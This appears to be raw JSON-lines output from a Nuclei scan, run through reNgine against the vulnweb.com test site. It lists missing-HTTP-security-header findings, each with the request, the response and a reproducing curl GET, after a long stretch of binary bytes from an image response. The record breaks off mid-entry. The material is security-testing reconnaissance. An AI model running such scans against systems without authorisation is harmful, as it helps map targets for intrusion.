n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:08.576044103Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:08.576182456Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:08.576208238Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:09.343596378Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:09.343679721Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 